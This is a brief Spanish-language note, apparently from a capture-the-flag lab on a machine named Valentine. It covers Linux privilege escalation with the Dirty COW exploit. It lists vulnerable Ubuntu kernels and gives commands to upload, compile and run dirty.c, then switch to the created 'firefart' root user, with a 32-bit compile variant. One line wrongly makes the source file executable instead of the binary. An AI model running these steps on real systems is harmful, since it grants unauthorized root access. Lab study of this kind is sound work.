Linux escalation

https://dirtycow.ninja/

son vulnerbles

  • linux-image-4.8.0-26 (4.8.0-26.28) for Ubuntu 16.10
  • linux-image-4.4.0-45 (4.4.0-45.66) for Ubuntu 16.04 LTS
  • linux-image-3.13.0-100 (3.13.0-100.147) for Ubuntu 14.04 LTS
  • linux-image-3.2.0-113 (3.2.0-113.155) for Ubuntu 12.04 LTS
  • linux-image-4.4.0-1029-raspi2 (4.4.0-1029.36)

Para checar que tienes:

hype@Valentine:~$ uname -a

hype@Valentine:~$ lsb_release -a

 

para usar por ejemplo la verción de c (dirty.c)

checas que este instalado gcc

which gcc

lo subes con httpserver

lo compilas y lo haces ejecutable

gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty.c
./dirty
su firefart

firefart es el nuevo usuario

Si tienes una architectura diferente puedes forzarlo a usar otra. Por ejemplo la mia era 64 y necesitaba correrlo en una computadora que no tenia gcc t era 32.

gcc -pthread dirty.c -o dirty -lcrypt -m32